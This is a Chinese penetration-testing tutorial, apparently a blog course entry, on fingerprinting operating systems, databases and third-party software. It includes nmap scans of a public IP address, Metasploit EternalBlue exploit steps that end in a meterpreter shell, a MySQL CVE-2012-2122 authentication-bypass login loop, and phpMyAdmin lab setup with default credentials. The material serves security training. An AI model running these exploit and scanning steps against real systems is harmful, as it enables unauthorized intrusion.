第五天:基础入门-系统及数据库等

基础入门-系统及数据库等

前言:除去前期讲到过的搭建平台中间件,网站源码外,容易受到攻击的还有操作系统,数据库,第三方软件平台等,其中此类攻击也能直接影响到WEB或服务器的安全,导致网站或服务器权限的获取。

一、操作系统层面

1、识别操作系统常见方法

  • 有网站
    • 可以通过大小写判断
    • Windows对大小写不敏感,Linux对大小写敏感
  • 没有网站
    • 可以通过nmap扫描
    • 命令 nmap -O IP地址
┌──(root💀kali)-[~]
└─# nmap -O 47.75.212.155
Starting Nmap 7.91 ( https://nmap.org ) at 2023-04-17 15:02 CST
Nmap scan report for 47.75.212.155
Host is up (0.099s latency).
Not shown: 989 closed ports
PORT      STATE    SERVICE
22/tcp    filtered ssh
80/tcp    open     http
135/tcp   filtered msrpc
139/tcp   filtered netbios-ssn
445/tcp   filtered microsoft-ds
3306/tcp  open     mysql
3389/tcp  filtered ms-wbt-server
8888/tcp  open     sun-answerbook
49152/tcp open     unknown
49153/tcp open     unknown
49154/tcp open     unknown
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|7|Vista|8.1|2012 (98%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1:r1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (98%), Microsoft Windows 7 SP1 (94%), Microsoft Windows 7 or Windows Server 2008 R2 (94%), Microsoft Windows Server 2008 or 2008 Beta 3 (94%), Microsoft Windows 7 (94%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (94%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (94%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (94%), Microsoft Windows Vista SP2 (94%), Microsoft Windows Server 2008 (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 24 hops

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.43 seconds

2、简要两者区别及识意义

  • 区别出不同的操作系统才能准确的进行测试、因为windows和linux的漏洞是不一样的

3、操作系统层面漏洞类型对应意义

  • 不同的漏洞,利用的条件不同。

4、简要识别操作系统层面漏洞影响范围

  • 有些漏洞能获取操作系统权限,有些漏洞只能对操作系统照成干扰

二、数据库层面

1、识别数据库类型常见方法

  • 语言:
    • 组合类型asp + access/mssql
    • 组合类型php + mysql
    • 组合类型aspx+mssql
    • 组合类型jsp +mysql/oracle
    • 组合类型Python + MongoDB
  • 操作系统:
    • access, mssql只能安装到Windows操作系统上,其他数据库两种系统都可以安装

2、数据库类型区别及识别意义

  • 数据库类型不同表示的结构和漏洞也是不同
  • 不同的数据库的攻击方式也不同

3、数据库常见漏洞类型及攻击

  • 强力(或非强力)破解弱口令或默认的用户名及口令
  • 特权提升
  • 利用未用的和不需要的数据库服务和和功能中的漏洞
  • 针对未打补丁的数据库漏洞
  • SQL注入

4、简要数据库层面漏洞影响范围

  • 参考数据库的重要程来判定影响范围

三、第三方层面

1、如何判断有那些第三方平台或软件

  • 通过nmap扫描可以判断有那些第三方平台或软件
  • 命令:nmap -O -sV IP地址
┌──(root💀kali)-[~]
└─# nmap -O -sV 47.75.212.155   
Starting Nmap 7.91 ( https://nmap.org ) at 2023-04-17 21:07 CST
Nmap scan report for 47.75.212.155
Host is up (0.084s latency).
Not shown: 990 closed ports
PORT      STATE    SERVICE            VERSION
80/tcp    open     http               Apache httpd 2.4.46 ((Win32) OpenSSL/1.1.1g mod_fcgid/2.3.9a)
135/tcp   open     msrpc              Microsoft Windows RPC
139/tcp   open     netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   filtered microsoft-ds
3306/tcp  open     mysql              MySQL (unauthorized)
3389/tcp  open     ssl/ms-wbt-server?
8888/tcp  open     http               Ajenti http control panel
49152/tcp open     msrpc              Microsoft Windows RPC
49153/tcp open     msrpc              Microsoft Windows RPC
49154/tcp open     msrpc              Microsoft Windows RPC
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|7|2012|Vista|8.1 (96%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_8.1:r1
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (96%), Microsoft Windows Server 2008 R2 or Windows 8 (95%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (95%), Microsoft Windows 7 (92%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2008 R2 SP1 (90%), Microsoft Windows 7 SP1 (90%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 or 2008 Beta 3 (90%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 25 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.77 seconds

2、简要为什么要识别第三方平台或软件

  • 不同的第三方软件或工具存在不同的漏洞、识别到越多的信息,收集到的漏洞也就越多

3、常见第三方平台或软件漏洞类型及攻击

  • 弱口令
  • 版本漏洞

4、简要第三方平台或软件安全测试的范围

  • 直接获取到软件的权限便于进一步的提权和攻击

四、补充

除去常规WEB安全及APP安全测试外,类似服务器单一或复杂的其他服务(邮件,游戏,负载均衡等),也可以作为安全测试目标,此类目标测试原则只是少了WEB应用或其他安全问题。所以明确安全测试思路是很重要的!

课程安排→漏洞技术→WEB层面→系统层面→第三方等其他

案例演示

1、上述涉及的基础知识演示

2、某操作系统层面漏洞演示

  • 永恒之蓝漏洞(ms17-010)

msfconsole //启动msfconsole

search ms17-010 //搜索ms17-010相关模块,可以看到一共找到了6个不同的模块

use auxiliary/scanner/smb/smb_ms17_010 //加载扫描模块

show options //查看配置选项

use exploit/windows/smb/ms17_010_eternalblue //使用永恒之蓝攻击模块:exploit/windows/smb/ms17_010_eternalblue

set payload //设置攻击载荷

set rhosts 192.168.110.237 //查看选项并设置rhosts

exploit //输入exploit开始攻击

运行成功会出现meterpreter > //Meterpreter 是 Metasploit 的一个扩展模块,可以调用 Metasploit 的一些功能,对目标系统进行更深入的渗透,如获取屏幕、上传/下载文件、创建持久后门等。

screenshot //捕获屏幕

3、某数据库弱口令及漏洞演示

  • MySql身份认证绕过漏洞(CVE-2012-2122)

主机:192.168.217.11

cd /path/to/vuln/vulhub/mysql/CVE-2012-2122 //进入漏洞环境目录

docker-compose up -d //启动测试环境

在浏览器中浏览 //默认端口3306

for i in seq 1 1000; do mysql -uroot -pwrong -h 192.168.217.111 -P3306 ; done //在不知道我们环境正确密码的情况下,运行命令,在一定数量尝试后便可成功登录

4、某第三方应用安全漏洞演示

  • phpMyAdmin 4.0.x-4.6.2 远程代码执行漏洞(CVE-2016-5734)

cd /path/to/vuln/vulhub/phpmyadmin/CVE-2016-5734 //进入漏洞环境目录

docker-compose up -d //启动测试环境

在浏览器中浏览 //默认端口8080

默认账户root

原始密码root

涉及资源

https://nmap.org/ nmap
https://www.kali.org/get-kali/ Kali
https://github.com/hellogoldsnakeman/masnmapscan-V1.0 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值